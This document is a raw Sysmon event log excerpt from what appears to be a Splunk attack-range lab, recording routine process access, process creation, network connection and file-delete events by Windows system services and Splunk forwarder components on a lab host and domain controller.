10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213822Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213821Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213820Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-0DC5-6216-E703-000000003902}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213819Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.151{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0DC5-6216-E703-000000003902}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213818Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.152{4F8D34B0-0DC5-6216-E703-000000003902}3128C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213817Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.089{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA4AA3B87D98E229ADC3D196C6A4A748,SHA256=2B0FCD20EBE522BFA04D8955BD2F746B7A42B7307B2F105F0987600F0DFC0BB3,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000284790Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:44.666{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local53202-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000284789Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:46.188{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6A132FB2FDCE729D0EBFBEC082264246,SHA256=9B34915A9B29D07292938AF68F12F1FB6DA07CF662D74B31342E4ADFFAE4D68C,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000213849Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:44.669{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51150-false10.0.1.12-8000- 23542300x8000000000000000213848Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:46.370{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A6AC9BC0F913C746A1C7BB864E298E5F,SHA256=19AE90706F4D3C3E7D1D1CC5907BF1B6C24FEA34915C9332DE74D26B33E8FA5B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213847Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:46.167{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2A0D3C5216790087E85372BD9CE3985,SHA256=B82B3DDD865909EC19B3ABC6091AE684565B660A694EFDCB77C2F8479D27B4AC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213846Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:46.167{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CC34105F612AD7B457DD3F4DC095E613,SHA256=52D995D27420954E795C35D7EACD0B6DD3CD78D8DBC8A10EED5744C1F9DD3D64,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213845Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:46.011{4F8D34B0-0DC5-6216-E803-000000003902}1008776C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 354300x8000000000000000213865Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:45.057{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51151-false10.0.1.12-8089- 10341000x8000000000000000213864Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.651{4F8D34B0-0DC7-6216-E903-000000003902}26562684C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213863Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-0DC7-6216-E903-000000003902}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213862Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213861Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213860Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213859Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213858Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213857Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213856Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213855Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213854Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213853Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-0DC7-6216-E903-000000003902}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213852Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.432{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-0DC7-6216-E903-000000003902}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213851Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.433{4F8D34B0-0DC7-6216-E903-000000003902}2656C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000213850Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:47.370{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2DC6FC88E52965574AB7BDC4E23F5869,SHA256=B7B156C38D84C949D098340576A622EA8DDEFE6B16A0707360018CC5409D76E0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000284791Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:34:47.235{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9F2EF23BAFD6E44C3083BD321EBBFBB4,SHA256=F68B712DF66B42324F0890782FB555CA573C6652B178F81FDF36BBCCE1BF589E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213880Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.682{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=68F87279CD68AAED6A8BE5CE6BBFB7D4,SHA256=8DCF89B086325311470A6DEBAC5591329C7E18C4858F996681A11AA175E28A66,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000213879Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:34:48.682{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B2A0D3C5216790087E85372BD9CE3985,SHA256=B82B3DDD865909EC19B3ABC6091AE684565B660A694EFDCB77C2F8479D27B4AC,IMPHASH=00000000000000000000000000000000falsetrue 